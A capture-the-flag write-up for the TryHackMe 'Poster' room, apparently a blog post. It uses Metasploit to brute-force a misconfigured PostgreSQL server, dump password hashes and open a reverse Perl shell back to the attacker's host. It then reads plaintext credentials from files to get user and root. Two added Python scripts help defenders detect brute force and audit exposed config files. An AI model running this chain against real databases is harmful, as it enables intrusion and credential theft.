
The sys admin set up a rdbms in a safe way.
| Title | Poster |
|---|---|
| Description | The sys admin set up a rdbms in a safe way. |
| Points | 360 |
| Difficulty | Easy |
| Maker | stuxnet |
Summary
Poster: on this machine we use several Metasploit modules that target a misconfigured PostgreSQL RDBMS. We obtain credentials, exploit further to get a shell, and once in we pivot horizontally to get the user flag and vertically to get the root flag.
Description
What is an RDBMS?
Based on E. F. Codd's relational model, an RDBMS lets users build, update, manage, and interact with a relational database, which stores data as tables.
Today, several companies use relational databases instead of flat files or hierarchical databases to store business data. This is because a relational database can handle a wide range of data formats and process queries efficiently. In addition, it organizes data into tables that can be linked internally based on common data. This allows the user to easily retrieve one or more tables with a single query. On the other hand, a flat file stores data in a single table structure, making it less efficient and consuming more space and memory.
Most commercially available RDBMSs currently use Structured Query Language (SQL) to access the database. RDBMS structures are most commonly used to perform CRUD operations (create, read, update, and delete), which are critical to support consistent data management.
Enumeration
Checking port 80 led nowhere, so we'll focus on PostgreSQL for now.
```console
┌──(azadin㉿kali)-[~/tryhackme]
└─$ nmap -p$ports -sC -sV -Pn -n 10.10.89.171
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-04 08:09 UTC
Nmap scan report for 10.10.89.171
Host is up (0.089s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 71:ed:48:af:29:9e:30:c1:b6:1d:ff:b0:24:cc:6d:cb (RSA)
| 256 eb:3a:a3:4e:6f:10:00:ab:ef:fc:c5:2b:0e:db:40:57 (ECDSA)
|_ 256 3e:41:42:35:38:05:d3:92:eb:49:39:c6:e3:ee:78:de (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Poster CMS
5432/tcp open postgresql PostgreSQL DB 9.5.8 - 9.5.10 or 9.5.17 - 9.5.23
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-07-29T00:54:25
|_Not valid after: 2030-07-27T00:54:25
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
To find valid credentials, let's use Metasploit and search for auxiliary modules that help enumerate the RDBMS at hand:
```console
┌──(azadin㉿kali)-[~/tryhackme]
└─$ msfconsole -q
msf6 > search type:auxiliary postgres
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/server/capture/postgresql . normal No Authentication Capture: PostgreSQL
1 auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal Yes ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
2 auxiliary/analyze/crack_databases . normal No Password Cracker: Databases
3 \_ action: hashcat . . . Use Hashcat
4 \_ action: john . . . Use John the Ripper
5 auxiliary/scanner/postgres/postgres_dbname_flag_injection . normal No PostgreSQL Database Name Command Line Flag Injection
6 auxiliary/scanner/postgres/postgres_login . normal No PostgreSQL Login Utility
7 auxiliary/admin/postgres/postgres_readfile . normal No PostgreSQL Server Generic Query
8 auxiliary/admin/postgres/postgres_sql . normal No PostgreSQL Server Generic Query
9 auxiliary/scanner/postgres/postgres_version . normal No PostgreSQL Version Probe
10 auxiliary/scanner/postgres/postgres_hashdump . normal No Postgres Password Hashdump
11 auxiliary/scanner/postgres/postgres_schemadump . normal No Postgres Schema Dump
12 auxiliary/admin/http/rails_devise_pass_reset 2013-01-28 normal No Ruby on Rails Devise Authentication Password Reset
Interact with a module by name or index. For example info 12, use 12 or use auxiliary/admin/http/rails_devise_pass_reset
msf6 > use 6
[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/postgres/postgres_login) > options
```
We found the one we need. Running options shows exactly what has to be configured, just RHOSTS in this case, and then we run it:
```console
Module options (auxiliary/scanner/postgres/postgres_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
CreateSession false no Create a new session for every successful login
DATABASE template1 yes The database to authenticate against
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, socks5h, sapni, http, socks4
RETURN_ROWSET true no Set to true to see query result sets
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 5432 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt no File containing (space-separated) users and passwords, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 10.10.89.171
RHOSTS => 10.10.89.171
msf6 auxiliary(scanner/postgres/postgres_login) > run
[!] No active DB -- Credential data will not be saved!
[-] 10.10.89.171:5432 - LOGIN FAILED: :@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: :tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: :postgres@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: :password@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: :admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: postgres:@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: postgres:postgres@template1 (Incorrect: Invalid username or password)
[+] 10.10.89.171:5432 - Login Successful: postgres:password@template1
[-] 10.10.89.171:5432 - LOGIN FAILED: scott:@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: scott:tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: scott:postgres@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: scott:password@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: scott:admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: admin:@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: admin:tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: admin:postgres@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Bruteforce completed, 1 credential was successful.
[*] You can open a Postgres session with these credentials and CreateSession set to true
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/postgres/postgres_login) > use 8
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(admin/postgres/postgres_sql) > options
Module options (auxiliary/admin/postgres/postgres_sql):
```
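From the defender's side, the sweep above is loud in the PostgreSQL log: every guess is a fresh connection followed by a FATAL authentication failure from the same client host. The Python below is an added example, not part of the room or this writeup: it correlates failures with the client host by backend pid and flags hosts that cross a threshold inside a time window, also recording whether a login from that host later succeeded. It assumes log_connections = on and a log_line_prefix of '%t [%p] ', and the log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log, shaped like PostgreSQL output with log_connections = on and
# log_line_prefix = '%t [%p] ' (assumptions). Each guess is a fresh backend pid.
SAMPLE_LOG = """\
2025-07-04 08:20:01 UTC [4101] LOG:  connection received: host=10.9.2.77 port=51002
2025-07-04 08:20:01 UTC [4101] FATAL:  password authentication failed for user "postgres"
2025-07-04 08:20:01 UTC [4102] LOG:  connection received: host=10.9.2.77 port=51003
2025-07-04 08:20:01 UTC [4102] FATAL:  password authentication failed for user "postgres"
2025-07-04 08:20:02 UTC [4104] LOG:  connection received: host=10.9.2.77 port=51005
2025-07-04 08:20:02 UTC [4104] LOG:  connection authorized: user=postgres database=template1
2025-07-04 08:20:03 UTC [4105] LOG:  connection received: host=10.9.2.77 port=51006
2025-07-04 08:20:03 UTC [4105] FATAL:  password authentication failed for user "scott"
2025-07-04 08:20:04 UTC [4106] LOG:  connection received: host=10.9.2.77 port=51007
2025-07-04 08:20:04 UTC [4106] FATAL:  password authentication failed for user "admin"
2025-07-04 08:25:00 UTC [4200] LOG:  connection received: host=10.0.0.5 port=60000
2025-07-04 08:25:00 UTC [4200] LOG:  connection authorized: user=app database=poster
"""

LINE_RE = re.compile(r'^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) \w+ \[(?P<pid>\d+)\] '
                     r'(?:LOG|FATAL):\s+(?P<msg>.*)$')
RECV_RE = re.compile(r'connection received: host=(?P<host>\S+)')
FAIL_RE = re.compile(r'password authentication failed for user "(?P<user>[^"]+)"')
AUTH_RE = re.compile(r'connection authorized: user=(?P<user>\S+)')

def find_bruteforce(log_text, threshold=3, window=timedelta(minutes=5)):
    """Return {client_host: summary} for hosts with >= threshold failed password
    logins inside `window`, noting any login that later succeeded from that host."""
    pid_host = {}                  # backend pid -> client host (from 'connection received')
    failures = defaultdict(list)   # host -> [(timestamp, user)]
    successes = defaultdict(list)  # host -> [(timestamp, user)]
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m['ts'], '%Y-%m-%d %H:%M:%S')
        pid, msg = m['pid'], m['msg']
        if (r := RECV_RE.search(msg)):
            pid_host[pid] = r['host']
        elif (f := FAIL_RE.search(msg)):
            failures[pid_host.get(pid, 'unknown')].append((ts, f['user']))
        elif (a := AUTH_RE.search(msg)):
            successes[pid_host.get(pid, 'unknown')].append((ts, a['user']))

    alerts = {}
    for host, events in failures.items():
        events.sort()
        # Sliding window: any run of `threshold` failures inside `window` is an alert.
        for i in range(len(events) - threshold + 1):
            if events[i + threshold - 1][0] - events[i][0] <= window:
                alerts[host] = {
                    'failures': len(events),
                    'users_tried': sorted({u for _, u in events}),
                    'succeeded_as': sorted(u for t, u in successes[host] if t >= events[i][0]),
                }
                break
    return alerts
```

A failure burst that ends in `succeeded_as` being non-empty is the case worth paging on: the guessed password worked, as it did here with postgres:password.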
We got valid credentials: postgres:password. Before moving on to the RCE module, let's confirm access with the generic query module, postgres_sql (index 8 in the list above), setting PASSWORD to password and RHOSTS again:
```console
msf6 auxiliary(admin/postgres/postgres_sql) > options
Module options (auxiliary/admin/postgres/postgres_sql):
Name Current Setting Required Description
---- --------------- -------- -----------
RETURN_ROWSET true no Set to true to see query result sets
SQL select version() no The SQL query to execute
VERBOSE false no Enable verbose output
Used when connecting via an existing SESSION:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION no The session to run this module on
Used when making a new connection via RHOSTS:
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE postgres no The database to authenticate against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 5432 no The target port
USERNAME postgres no The username to authenticate as
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/postgres/postgres_sql) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(admin/postgres/postgres_sql) > set RHOSTS 10.10.89.171
RHOSTS => 10.10.89.171
msf6 auxiliary(admin/postgres/postgres_sql) > run
[*] Running module against 10.10.89.171
Query Text: 'select version()'
==============================
version
-------
PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit
[*] Auxiliary module execution completed
```
This worked, and it also revealed the exact version nmap could only guess at earlier: 9.5.21.
```console
10 auxiliary/scanner/postgres/postgres_hashdump . normal No Postgres Password Hashdump
11 auxiliary/scanner/postgres/postgres_schemadump . normal No Postgres Schema Dump
12 auxiliary/admin/http/rails_devise_pass_reset 2013-01-28 normal No Ruby on Rails Devise Authentication Password Reset
Interact with a module by name or index. For example info 12, use 12 or use auxiliary/admin/http/rails_devise_pass_reset
msf6 auxiliary(admin/postgres/postgres_sql) > use 10
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(scanner/postgres/postgres_hashdump) > options
Module options (auxiliary/scanner/postgres/postgres_hashdump):
Used when connecting via an existing SESSION:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION no The session to run this module on
Used when making a new connection via RHOSTS:
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE postgres no The database to authenticate against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 5432 no The target port
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME postgres no The username to authenticate as
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/postgres/postgres_hashdump) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(scanner/postgres/postgres_hashdump) > set RHOSTS 10.10.89.171
RHOSTS => 10.10.89.171
msf6 auxiliary(scanner/postgres/postgres_hashdump) > run
[+] Query appears to have run successfully
[+] Postgres Server Hashes
======================
Username Hash
-------- ----
darkstart md58842b99375db43e9fdf238753623a27d
poster md578fb805c7412ae597b399844a54cce0a
postgres md532e12f215ba27cb750c9e093ce4b5127
sistemas md5f7dbc0d5a06653e74da6b1af9290ee2b
ti md57af9ac4c593e9e4f275576e13f935579
tryhackme md503aab1165001c8f8ccae31a8824efddc
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Using the postgres_hashdump module above, we do indeed get the password hashes.
For the next question: What is the full path of the module (starting with auxiliary) that allows an authenticated user to view files of their choosing on the server?
The list of auxiliary modules above already has the answer: auxiliary/admin/postgres/postgres_readfile
And for the other one: What is the full path of the module that allows arbitrary command execution with the proper user credentials (starting with exploit)?
We'll be using exploit/multi/postgres/postgres_copy_from_program_cmd_exec (a simple search for exploit instead of auxiliary returns it).
```console
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set password password
password => password
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > options
Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_TABLE_OUTPUT false no select payload command output from table (For Debugging)
TABLENAME kUCyqgY8 yes A table name that does not exist (To avoid deletion)
Used when connecting via an existing SESSION:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION no The session to run this module on
Used when making a new connection via RHOSTS:
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE postgres no The database to authenticate against
PASSWORD password no The password for the specified username. Leave blank for a random password.
RHOSTS no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 5432 no The target port (TCP)
USERNAME postgres no The username to authenticate as
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set rhosts 10.10.89.171
rhosts => 10.10.89.171
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set lhost tun0
lhost => 10.9.2.77
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run
[*] Started reverse TCP handler on 10.9.2.77:4444
[*] 10.10.89.171:5432 - 10.10.89.171:5432 - PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit
[*] 10.10.89.171:5432 - Exploiting...
[+] 10.10.89.171:5432 - 10.10.89.171:5432 - kUCyqgY8 dropped successfully
[+] 10.10.89.171:5432 - 10.10.89.171:5432 - kUCyqgY8 created successfully
[+] 10.10.89.171:5432 - 10.10.89.171:5432 - kUCyqgY8 copied successfully(valid syntax/command)
[+] 10.10.89.171:5432 - 10.10.89.171:5432 - kUCyqgY8 dropped successfully(Cleaned)
[*] 10.10.89.171:5432 - Exploit Succeeded
[*] Command shell session 1 opened (10.9.2.77:4444 -> 10.10.89.171:34616) at 2025-07-04 08:35:24 +0000
getuid
id
uid=109(postgres) gid=117(postgres) groups=117(postgres),116(ssl-cert)
ls /home
alison
dark
```
After setting the right options again, we get a shell as postgres, and listing /home shows two users. Now we need to pivot to another user:
```console
ls /home/dark
credentials.txt
cat /home/dark/credentials.txt
dark:qwerty1234#!hackme
```
Looks like we found our way in! We just need to SSH in as dark from here.
User flag
Here we see that user.txt is in alison's home directory, so we need to pivot once more. The classic tricks didn't work, and before doing things the hard way I remembered there was a web server running on port 80, so its directory may be worth checking.
```console
$ cd var
$ ls
backups cache lib local lock log mail opt run spool tmp www
$ cd www
$ ls -als
total 12
4 drwxr-xr-x 3 root root 4096 Jul 28 2020 .
4 drwxr-xr-x 12 root root 4096 Jul 28 2020 ..
4 drwxr-xr-x 3 root root 4096 Jul 28 2020 html
$ cd html
$ ls -als
total 16
4 drwxr-xr-x 3 root root 4096 Jul 28 2020 .
4 drwxr-xr-x 3 root root 4096 Jul 28 2020 ..
4 -rwxrwxrwx 1 alison alison 123 Jul 28 2020 config.php
4 drwxr-xr-x 4 alison alison 4096 Jul 28 2020 poster
$ cat config.php
<?php
$dbhost = "127.0.0.1";
$dbuname = "alison";
$dbpass = "p4ssw0rdS3cur3!#";
$dbname = "mysudopassword";
?>$
$ su alison
Password:
su: Authentication failure
$ su alison
Password:
alison@ubuntu:/var/www/html$ ls /home/alison
user.txt
```
And I was right: we find the DB credentials. Using them against the database didn't work, so I tried them to log in as alison, and that's how we got the user flag.
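The root cause of this step is a config.php that is readable and writable by everyone (-rwxrwxrwx) and holds a database password that doubled as alison's login password. As an added example that is not from the writeup or the room, the Python below audits a web root for files that contain credential-looking assignments and are exposed to "other", reporting variable names and modes but never the values; the sample tree it builds is constructed to mirror /var/www/html from the box, with a placeholder in place of the real password.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Assignments whose variable name suggests a secret (e.g. $dbpass = "...").
CRED_RE = re.compile(
    r'\$?(?P<name>\w*(?:pass|pwd|secret|token)\w*)\s*=\s*["\']', re.IGNORECASE)


def audit_webroot(root):
    """Walk `root` and report files that contain a credential-looking assignment
    AND are readable or writable by 'other' (config.php on the box was -rwxrwxrwx).
    Only variable names and modes are reported, never the values."""
    findings = []
    for path in sorted(Path(root).rglob('*')):
        if not path.is_file():
            continue
        mode = path.stat().st_mode
        world_r, world_w = bool(mode & stat.S_IROTH), bool(mode & stat.S_IWOTH)
        if not (world_r or world_w):
            continue                      # owner/group-only files are fine here
        try:
            text = path.read_text(errors='replace')
        except OSError:
            continue
        names = sorted({m['name'] for m in CRED_RE.finditer(text)})
        if names:
            findings.append({'path': str(path.relative_to(root)), 'vars': names,
                             'world_readable': world_r, 'world_writable': world_w,
                             'mode': oct(stat.S_IMODE(mode))})
    return findings


def build_sample_tree():
    """Construct a throwaway web root shaped like /var/www/html in the writeup."""
    root = tempfile.mkdtemp(prefix='webroot-')
    cfg = Path(root, 'config.php')
    cfg.write_text('<?php\n$dbhost = "127.0.0.1";\n$dbuname = "alison";\n'
                   '$dbpass = "PLACEHOLDER-NOT-REAL";\n$dbname = "mysudopassword";\n?>\n')
    os.chmod(cfg, 0o777)                  # the over-permissive mode seen on the box
    good = Path(root, 'poster', 'db.php')
    good.parent.mkdir()
    good.write_text('<?php $dbpass = "PLACEHOLDER-NOT-REAL";\n')
    os.chmod(good, 0o640)                 # owner/group only: must not be reported
    Path(root, 'index.php').write_text('<?php echo "hi";\n')  # no secrets at all
    return root


if __name__ == '__main__':
    for finding in audit_webroot(build_sample_tree()):
        print(finding)
```

Fixing the finding means tightening the mode (owner and web-server group only) and, separately, making sure the database password is not also a system account password.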
Root Flag
This one is easy, nothing fancy needed, since alison can already run every command with sudo, so just:
```console
alison@ubuntu:~$ sudo -l
[sudo] password for alison:
Matching Defaults entries for alison on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alison may run the following commands on ubuntu:
(ALL : ALL) ALL
alison@ubuntu:~$ sudo su
root@ubuntu:/home/alison# cd /root
root@ubuntu:~# ls
root.txt
root@ubuntu:~# cat root.txt
THM{c0ngrats_for_read_the_f1le_w1th_credent1als}
root@ubuntu:~#
```